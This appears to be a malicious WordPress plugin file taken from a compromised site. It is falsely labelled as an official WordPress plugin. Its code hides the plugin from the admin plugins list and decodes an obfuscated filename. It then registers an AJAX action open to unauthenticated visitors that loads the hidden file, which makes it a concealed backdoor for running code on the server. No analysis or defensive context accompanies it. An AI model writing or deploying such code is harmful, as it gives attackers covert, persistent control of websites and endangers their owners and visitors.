/home/bonphmya/topcontenedor.com/wp-content/plugins/wp-vm-groupware/wp-vm-groupware.php
<?php
/*
Plugin Name: WP Vm Groupware
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 7.2.4
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function wlg_ihe() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $r = array('wp-vm-groupware/wp-vm-groupware.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $r)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function ojv_tym($plugins) {
    $x = 'wp-vm-groupware/wp-vm-groupware.php';
    if (array_key_exists($x, $plugins)) {
        unset($plugins[$x]);
    }
    return $plugins;
}

function ogd($u, $a) {
    $q = '';
    for ($s = 0; $s < strlen($u); $s += 2) {
        $g = ord($u[$s]) - 65;
        $c = ord($u[$s + 1]);
        if ($c > 90) $c -= 6;
        $f = $g * 52 + ($c - 65);
        $q .= chr($f - $a);
    }
    return $q;
}

function bay_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . ogd('IiIXIvIlIrIqHYIZIpIp', 342);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'wlg_ihe');
    add_filter('all_plugins', 'ojv_tym');
    
    add_action('wp_ajax_vm_gro', 'bay_ajax_handler');
    add_action('wp_ajax_nopriv_vm_gro', 'bay_ajax_handler');
}